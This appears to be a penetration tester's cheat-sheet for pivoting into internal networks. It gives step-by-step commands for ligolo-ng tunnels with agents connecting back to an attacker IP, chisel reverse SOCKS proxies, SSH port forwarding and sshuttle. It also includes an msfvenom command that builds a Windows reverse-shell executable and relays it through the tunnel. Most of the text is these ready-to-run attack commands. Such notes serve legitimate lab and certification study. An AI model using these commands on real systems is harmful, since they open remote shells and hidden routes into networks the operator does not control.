Refer this for more techniques
Use my script from script Proxify.sh from here
- Attacker:
sudo ip tuntap add user kali mode tun ligolo
sudo ip link set ligolo up
sudo ip route add 172.16.201.0/24 dev ligolo
sudo ligolo-proxy -selfcert
Add the targets ip range as seen in ifconfig in ligolo
For this add 172.16.201.0/24
- Target:
./agent -connect 192.168.45.244:11601 -ignore-cert -retry
listener_add --addr 0.0.0.0:1234 --to 0.0.0.0:4444
- Creates a listener on the machine where we're running the agent at port 1234
- and redirects the traffic to port 4444 on our machine.
- You can use other ports, of course.
Example for the listener above:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ip> LPORT=1234 -f exe -o reverse.exe
Create another listener
listener_add --addr 0.0.0.0:1235 --to 0.0.0.0:8000
Now transfer files by using the ip of the machine that was tunneled from earlier and use port 1234. Create a python server on port 8000 in kali.
- Attacker:
chisel server --reverse --socks5 -p 8001
- Target:
./chisel client <attacker ip>:8001 R:socks
Then add to /etc/proxychains5.conf
To forward a single port from target to our machine:
./chisel client 192.168.45.244:8001 R:8000:127.0.0.1:8000
Multiple ports can be forwarded
ssh -L <localhost ip>:localhost:<remote ip> [email protected]
Can be scanned like so :
nmap -v -sV -p1234 localhost
sudo sshuttle -r [email protected] 172.16.5.0/23 -v
sshuttle -r [email protected] --ssh-cmd "ssh -i key.rsa" 10.200.98.0/24 -x 10.200.98.200 &